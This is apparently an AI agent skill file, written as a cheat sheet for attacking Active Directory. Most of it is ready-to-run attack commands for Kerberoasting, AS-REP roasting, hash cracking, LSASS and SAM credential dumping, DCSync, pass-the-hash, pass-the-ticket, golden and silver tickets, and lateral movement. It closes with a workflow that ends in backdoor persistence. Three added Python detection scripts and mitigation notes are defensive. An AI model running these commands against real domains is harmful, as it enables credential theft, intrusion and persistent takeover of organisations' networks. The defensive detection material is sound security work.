| name | description |
|---|---|
| attacking-active-directory | Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations. |
# Attacking Active Directory

## When to Use
- AD reconnaissance and enumeration
- Kerberos-based attacks
- Credential dumping from domain controllers
- Lateral movement within domains
- BloodHound attack path analysis
- Domain persistence techniques
## Kerberoasting

Windows:

```powershell
# Check kerberoastable users
.\Rubeus.exe kerberoast /stats
# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
```

Linux:

```bash
# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt
# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt
# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password
```

Crack Hashes:

```bash
# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt
# John
john --wordlist=wordlist.txt hashes.txt
```
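Every roast above leaves a trail on the domain controller: each requested TGS is logged as Security event 4769, and tools that ask for RC4 tickets stand out when the rest of the domain uses AES. The following is an added detection example (not part of this cheat sheet or of any of the tools it lists) that flags one account requesting RC4 (0x17) service tickets for several distinct non-machine SPNs inside a short window. The event records and field names are constructed from the 4769 XML data names; thresholds and the five-minute window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 (Kerberos service ticket requested).
# Keys follow the event's XML data names; all values are invented for this example.
# TicketEncryptionType: 0x12 = AES256-CTS-HMAC-SHA1-96, 0x17 = RC4-HMAC.
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "TargetUserName": "alice@DOMAIN.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
    {"time": "2024-05-01T09:00:02", "TargetUserName": "alice@DOMAIN.LOCAL", "ServiceName": "WEB01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
    {"time": "2024-05-01T09:05:00", "TargetUserName": "bob@DOMAIN.LOCAL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77"},
    {"time": "2024-05-01T09:05:01", "TargetUserName": "bob@DOMAIN.LOCAL", "ServiceName": "svc_http",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77"},
    {"time": "2024-05-01T09:05:02", "TargetUserName": "bob@DOMAIN.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77"},
    {"time": "2024-05-01T09:05:03", "TargetUserName": "bob@DOMAIN.LOCAL", "ServiceName": "svc_sql2",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77"},
    # A single legacy RC4 request: normal noise, should not alert on its own.
    {"time": "2024-05-01T11:00:00", "TargetUserName": "carol@DOMAIN.LOCAL", "ServiceName": "svc_legacy",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.12"},
]

RC4_HMAC = "0x17"


def detect_kerberoasting(events, window=timedelta(minutes=5), min_spns=3):
    """Return (requester, source_ip, spn_set) tuples for accounts that requested
    RC4 service tickets for at least `min_spns` distinct user-account SPNs
    within `window`. Machine-account SPNs (name ends in '$') are skipped: their
    passwords are long and random, so they are not practical cracking targets
    and only add noise."""
    by_requester = defaultdict(list)
    for e in events:
        if e["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        if e["ServiceName"].endswith("$"):
            continue
        ts = datetime.fromisoformat(e["time"])
        by_requester[(e["TargetUserName"], e["IpAddress"])].append((ts, e["ServiceName"]))

    alerts = []
    for (requester, ip), reqs in by_requester.items():
        reqs.sort()  # chronological, so each index can start a sliding window
        for i, (start, _) in enumerate(reqs):
            spns = {name for ts, name in reqs[i:] if ts - start <= window}
            if len(spns) >= min_spns:
                alerts.append((requester, ip, spns))
                break  # one alert per requester/source pair is enough for triage
    return alerts


if __name__ == "__main__":
    for requester, ip, spns in detect_kerberoasting(SAMPLE_4769):
        print(f"possible kerberoasting: {requester} from {ip} -> {sorted(spns)}")
```

The same rule also catches the `/ldapfilter:'(admincount=1)'` variant, because it keys on distinct SPNs per requester rather than on a fixed account list. Reducing what it can find is the real mitigation: move service accounts to gMSAs or long random passwords, and set `msDS-SupportedEncryptionTypes` so that service accounts issue AES-only tickets, which turns any RC4 request into an immediate anomaly.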
## ASREPRoasting

Windows:

```powershell
# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired
# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat
```

Linux:

```bash
# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt
# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10
```

Crack AS-REP:

```bash
hashcat -m 18200 hashes.txt wordlist.txt
```
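What `Get-DomainUser -PreauthNotRequired` and `GetNPUsers.py` are really looking for is one bit in `userAccountControl`: `DONT_REQ_PREAUTH` (0x400000). The same bit is what a defender audits and clears. The added example below (not part of this cheat sheet or of PowerView/Impacket) decodes the relevant flag bits from constructed directory records, lists enabled accounts with pre-authentication disabled, and shows the corrected value once the flag is removed. The flag values are the standard ones from MS-ADTS; the account records are invented.

```python
# userAccountControl bits (standard values from MS-ADTS); only the ones this
# audit cares about are listed.
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

UAC_FLAGS = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

# Equivalent LDAP filter for ldapsearch: 1.2.840.113556.1.4.803 is the
# LDAP_MATCHING_RULE_BIT_AND rule, 4194304 is 0x400000 in decimal.
LDAP_FILTER_PREAUTH_DISABLED = (
    "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed records, as an LDAP export or Get-ADUser would return them.
SAMPLE_USERS = [
    {"sAMAccountName": "alice", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_legacy", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "old_svc", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH},
    {"sAMAccountName": "svc_backup",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH},
]


def describe_uac(value):
    """Human-readable flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_preauth_disabled(records, include_disabled=False):
    """sAMAccountNames with DONT_REQ_PREAUTH set. Disabled accounts cannot be
    roasted (the KDC refuses them), so they are skipped unless asked for."""
    hits = []
    for r in records:
        uac = r["userAccountControl"]
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(r["sAMAccountName"])
    return sorted(hits)


def clear_preauth_flag(uac):
    """The remediated userAccountControl value: identical, minus DONT_REQ_PREAUTH."""
    return uac & ~DONT_REQ_PREAUTH


if __name__ == "__main__":
    for name in find_preauth_disabled(SAMPLE_USERS):
        uac = next(r["userAccountControl"] for r in SAMPLE_USERS if r["sAMAccountName"] == name)
        print(f"{name}: {describe_uac(uac)} -> fix to 0x{clear_preauth_flag(uac):x}")
```

On the wire, an AS-REP roast shows up as event 4768 with `PreAuthType` 0 and, for the hashcat-friendly format, an RC4 (0x17) ticket; but since the flag is almost never needed on a modern domain, removing it (and rotating the affected passwords) is cheaper than detecting its abuse.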
## BloodHound

Data Collection:

```powershell
# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup
```

Linux:

```bash
# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip
```

Useful Queries (Cypher, entered in the BloodHound raw query box; `//` is the Cypher comment syntax):

```cypher
// Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p
// Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u
// AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u
// Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
// DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
```
## Credential Dumping

LSASS Dumping:

```powershell
# Task Manager: Right-click lsass.exe -> Create dump file
# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
```

```text
# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

SAM Dumping:

```powershell
# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
```

```bash
# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL
```

DCSync (Domain):

```bash
# secretsdump - dump all
secretsdump.py domain.local/user:password@dc.domain.local -just-dc
# Specific user
secretsdump.py domain.local/user:password@dc.domain.local -just-dc-user krbtgt
# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/user@dc.domain.local -just-dc
```
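DCSync works by asking the DC to replicate, so the DC logs it like any other directory access: a Security event 4662 on the domain object whose `Properties` field carries the replication control-access GUIDs. The added example below (not part of this cheat sheet or of Impacket) picks those GUIDs out of constructed 4662 records and alerts when the subject is not a known domain controller. The GUIDs are the well-known ones for the three replication rights; the events, account names and allowlist are invented, and in a real domain the allowlist also has to include legitimate sync accounts such as the one used by Entra Connect.

```python
import re

# Control-access right GUIDs that together make a DCSync possible (well-known values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcc2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcc2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # ObjectType for domainDNS objects
CONTROL_ACCESS = 0x100  # AccessMask value for an extended/control-access right
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662 records. The Properties field mimics the raw event text, which
# lists the right GUIDs one per line after a resource string (%%7688 = Control Access).
_REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcc2}"
               "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcc2}"
               f"\n\t{{{DOMAIN_DNS_CLASS}}}")
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "SubjectDomainName": "DOMAIN",
     "ObjectType": f"%{{{DOMAIN_DNS_CLASS}}}", "Properties": _REPL_PROPS, "AccessMask": "0x100"},
    {"SubjectUserName": "bob", "SubjectDomainName": "DOMAIN",
     "ObjectType": f"%{{{DOMAIN_DNS_CLASS}}}", "Properties": _REPL_PROPS, "AccessMask": "0x100"},
    # Ordinary attribute read on a user object: must not alert.
    {"SubjectUserName": "alice", "SubjectDomainName": "DOMAIN",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "%%7684\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10"},
]

DEFAULT_DC_ALLOWLIST = {"DC01$", "DC02$"}  # constructed: the domain's real DC computer accounts


def replication_rights_in(properties):
    """Names of replication rights whose GUIDs appear in a 4662 Properties field."""
    return sorted(REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
                  if g.lower() in REPLICATION_RIGHTS)


def detect_dcsync(events, allowlist=DEFAULT_DC_ALLOWLIST):
    """(subject, rights) for control-access 4662 events on the domain object that
    request replication rights from a subject outside the allowlist."""
    alerts = []
    for e in events:
        if int(e["AccessMask"], 16) & CONTROL_ACCESS == 0:
            continue
        if DOMAIN_DNS_CLASS not in e["ObjectType"].lower():
            continue
        rights = replication_rights_in(e["Properties"])
        if not rights:
            continue
        subject = e["SubjectUserName"]
        if subject in allowlist:
            continue
        alerts.append((f'{e["SubjectDomainName"]}\\{subject}', rights))
    return alerts


if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_4662):
        print(f"DCSync-like replication request by {subject}: {rights}")
```

Event 4662 is only written when an audit policy (Directory Service Access, plus a SACL on the domain object covering the replication rights) is in place, so check that first; the BloodHound `DCSync` query in the previous section is the complementary preventive control, showing which principals hold these rights before anyone uses them.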
## Pass-the-Hash

Windows:

```text
# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe
```

Linux:

```bash
# CrackMapExec
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami
# psexec
psexec.py -hashes :hash administrator@10.10.10.10
# wmiexec
wmiexec.py -hashes :hash administrator@10.10.10.10
# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash
```
## Pass-the-Ticket

Export Tickets:

```powershell
# Mimikatz
sekurlsa::tickets /export
# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10
```

Import/Use Tickets:

```powershell
# Mimikatz
kerberos::ptt ticket.kirbi
# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket
# Verify
klist
```

Linux PtT:

```bash
# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache
# Set ticket
export KRB5CCNAME=ticket.ccache
# Use ticket
psexec.py -k -no-pass domain.local/administrator@dc.domain.local
```
## Overpass-the-Hash

```powershell
# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt
# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt
```
## Golden/Silver Tickets

Golden Ticket (TGT):

```powershell
# Requirements: krbtgt hash, Domain SID
# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt
# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt
```

Silver Ticket (TGS):

```text
# Requirements: Service account hash, Service SPN
# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt
```
## Lateral Movement

CrackMapExec:

```bash
# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password
# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami
# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam
# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa
```

PSExec Variants:

```bash
# psexec
psexec.py domain/user:password@10.10.10.10
# wmiexec (stealthier)
wmiexec.py domain/user:password@10.10.10.10
# smbexec (no service)
smbexec.py domain/user:password@10.10.10.10
```

WinRM:

```powershell
# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user
```

```bash
# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash
```
## Enumeration

Domain Info:

```powershell
# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"
```

Linux Enumeration:

```bash
# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups
# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"
```

## Quick Workflow
- Initial Access → Get domain credentials
- Enumeration → Run BloodHound collection
- Kerberoasting → Extract and crack service tickets
- Lateral Movement → Use creds to move to high-value targets
- Credential Dumping → Dump LSASS/SAM on compromised hosts
- DCSync → Extract all domain hashes from DC
- Persistence → Golden ticket or create backdoor accounts
## Common Wins
- Kerberoasting weak service account passwords
- ASREPRoasting accounts without preauth
- BloodHound finding short paths to DA
- Pass-the-Hash from dumped credentials
- DCSync with compromised accounts that have replication rights
## Tools
- Rubeus - Kerberos attacks (Windows)
- Mimikatz - Credential dumping (Windows)
- Impacket - Comprehensive toolkit (Linux)
- BloodHound - AD relationship graphing
- CrackMapExec - Swiss army knife for AD
- PowerView - AD enumeration (PowerShell)
- evil-winrm - WinRM access (Linux)